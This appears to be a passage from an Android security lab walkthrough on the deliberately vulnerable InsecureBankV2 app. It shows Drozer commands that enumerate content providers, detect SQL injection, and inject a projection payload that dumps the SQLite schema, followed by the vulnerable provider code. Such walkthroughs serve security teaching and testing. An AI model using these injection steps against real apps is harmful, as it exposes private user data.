Copy dz> run app.provider.finduri com.android.insecurebankv2
Attempting to run shell module
Scanning com.android.insecurebankv2...
content://com.android.insecurebankv2.TrackUserContentProvider
content://com.google.android.gms.games
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
content://com.android.insecurebankv2.TrackUserContentProvider/
content://com.google.android.gms.games/
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
Copy dz> run scanner.provider.injection -a com.android.insecurebankv2
Attempting to run shell module
Scanning com.android.insecurebankv2...
Not Vulnerable:
content://com.google.android.gms.games
content://com.android.insecurebankv2.TrackUserContentProvider
content://com.android.insecurebankv2.TrackUserContentProvider/
content://com.google.android.gms.games/
Injection in Projection:
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
Injection in Selection:
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
Copy dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/ --projection ""
Attempting to run shell module
Exception occured: near "FROM" : syntax error (code 1 SQLITE_ERROR ): , while compiling: SELECT FROM names ORDER BY name
dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/ --projection "* from sqlite_master; --"
Attempting to run shell module
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) |
| table | names | names | 4 | CREATE TABLE names (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT NOT NULL) |
| table | sqlite_sequence | sqlite_sequence | 5 | CREATE TABLE sqlite_sequence(name,seq) |
Copy public Cursor query( Uri uri , String [] projection , String selection , String [] selectionArgs , String sortOrder) {
SQLiteQueryBuilder qb = new SQLiteQueryBuilder() ;
qb . setTables (TABLE_NAME);
switch ( uriMatcher . match (uri)) {
case 1 :
qb . setProjectionMap (values);
if (sortOrder == null || sortOrder == "" ) {
sortOrder = name;
}
Cursor c = qb . query ( this . db , projection , selection , selectionArgs , null , null , sortOrder);
c . setNotificationUri ( getContext() . getContentResolver () , uri);
return c;
default:
throw new IllegalArgumentException( "Unknown URI " + uri) ;
}
} 